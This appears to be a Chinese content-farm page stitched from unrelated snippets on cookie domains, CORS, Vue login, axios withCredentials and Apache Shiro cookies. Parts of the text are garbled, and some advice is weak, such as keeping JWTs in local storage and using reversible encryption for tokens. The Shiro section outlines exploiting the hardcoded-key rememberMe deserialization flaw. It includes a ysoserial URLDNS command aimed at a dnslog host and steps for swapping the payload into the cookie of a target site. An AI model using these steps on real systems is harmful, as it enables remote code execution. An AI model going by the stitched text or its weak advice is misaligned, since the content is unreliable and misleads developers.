后端接口返回cookie给前端，后端设置cookie

关于前后端写入cookie时domain的一个问题

1、另外发现，.xiaoming.com下的Cookie会出现在blog.xiaoming.com页面（也就是说可以被下级域名正确获取到），但是，xiaoming.com下的cookie不会出现在它的子域名页面！这个是以前没有注意的！所以特别注意：以Java为例：经测试同样存在和前端一样的问题：不传domain则默认当前域名，传了则强制在前面加一个.。

2、前后端分离的正常访问模式 后端cors配置相应前端的域名，允许跨域访问。后端的域名是meng.abc.com，前端的域名是m.abc.com。因为是同源，cookie读写正常。多个前端域名，访问同一个后端服务的情况 现在增加了两个前端域名，m.5com， m.xx.com。

3、在项目前后端分离的现代应用环境中，跨域问题常引发诸多挑战。本文聚焦于一个特定问题：为何在IP和域名部署的项目间，设置的Cookie无法在后续请求中携带？通过探索SaMESite属性及Cookie机制，我们将揭示其背后的原理，并提供解决跨域Cookie问题的方法。

vue怎么实现免密登录比较安全?

要在Vue中实现安全的免密登录，可以采取以下措施： 使用json web token 进行认证： 在后端生成JWT，并将其发送到前端。 前端将JWT存储到本地存储中。 在后续请求中，前端将JWT作为请求头的Authorization字段值发送到后端进行验证。

使用TLS/SSL。在后端Web服务器配置TLS/SSL，前端URL前添加HTTPS：//确保加密通信。TLS/SSL保护客户端和服务器通信安全，结合其他方法实现免密登录。 使用Token验证。Vue应用使用Axios处理HTTP请求，自动将Token保存到Authorization头。

以自行托管方式使用vue的方法是：新建仓库首先新建一个仓库，新建一个test的仓库。打包vue项目并上传在打包之前修改路径。配置GitHubPage，再打开github上的test仓库，里面有刚上传的vue项目文件，就完成了。打开工程目录下的ehome。

实现Vue项目中的RSA加解密功能，可以借助jsencrypt库简化操作。

定义密钥，使用可逆加密，实现token的生成与验证。login_blueprint.py中添加登录功能，处理登录请求：定义登录视图，验证用户输入，成功后生成并返回token。前端Vue实现在login.vue中，构建登录界面，绑定账号密码输入，验证通过后保存token并跳转：在login.vue中编写登录界面交互逻辑。

axios.defaults.withCredentials跨域携带cookie

在axios的默认配置中，withCredentials属性的默认值为false，这意味着默认情况下axios不会携带任何用户凭证进行跨域请求。为了在跨域请求中携带cookie等用户凭证，需要将axios.defaults.withCredentials设置为true。后端配置要求：当withCredentials设置为true时，后端服务器必须进行相应的配置。

在跨源请求中，默认情况下，axios不会提供任何凭据，包括cookie、HTTP认证及客户端SSL证明等。为了让axios在跨域请求时携带用户凭证，前端可以通过将withCredentials属性设置为true来指定某个请求应该发送凭据。withCredentials属性默认值为false。设置为true时，请求将携带用户凭证，包括cookie等。

axios.defaults.withCredentials=true；//设置允许携带cookie，默认不让携带 ```vue.js使用http-proxy-middleware解决跨域请求问题 最近在使用vue-cli搭建项目的过程中，遇到了跨域请求数据的问题，这里贴出我的解决方法，希望对大家有所帮助。

服务器响应头设置：在服务器端，通过设置响应头中的 access-Control-Allow-Origin 来允许跨域请求。若要指定特定域名，直接添加该域名即可；若需通配符匹配所有域名，确保与 Axios 的 withCredentials 配置相匹配，避免使用 *。安全控制至关重要，需合理配置以防止潜在威胁。

响应处理：如responseType和withCredentials，处理响应数据格式和跨域携带cookies。代理和取消请求功能：为爬虫抓取数据或处理需要取消的请求。拦截器：用于请求和响应的预处理，例如登录验证和数据格式转换。封装：将axios封装到一个文件中，便于管理和维护。

怎么让shiro给前端发cookie

1、shiro如何返回cookie给前端shiro如何返回cookie给前端。有个springboot项目，登录和权限采用shiro管理，某天前端开发人员突然说小程序页面里面无法把cookie传递给后端。

2、shiro默认使用了 CookieRememberMeManager ，其处理cookie的流程是：得到 rememberMe的cookie值 -- Base64解码 -- AES解密 -- 反序列化 。然而AES的密钥是硬编码的，就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。

3、利用ysoserial工具生成URLdns链或其他恶意payload。对payload进行加密和编码，以符合Shiro的cookie格式。修改rememberMe字段的值，将恶意payload嵌入其中。发送构造后的请求，观察DNS日志或系统日志，确认漏洞是否成功利用。

4、利用URLDNS链进行漏洞利用。通过生成URLDNS链，使用ysoserial工具创建payload（例如：`$JAVA -jar ysoserial URLDNS xxx.dnslog.cnTXT`）。编写脚本加密编码payload，并移除JSESSIONID（当存在时），修改rememberMe为加密后的值。发送请求至目标网站，通过查看dnslog验证是否成功发送请求，证明漏洞存在。

5、Shiro验证用户登录信息，通过后，查看用户是否勾选了”Remember Me“。若勾选，则将用户身份序列化，并将序列化后的内容进行AES加密，再使用base64编码。最后将处理好的内容放于cookie中的rememberMe字段。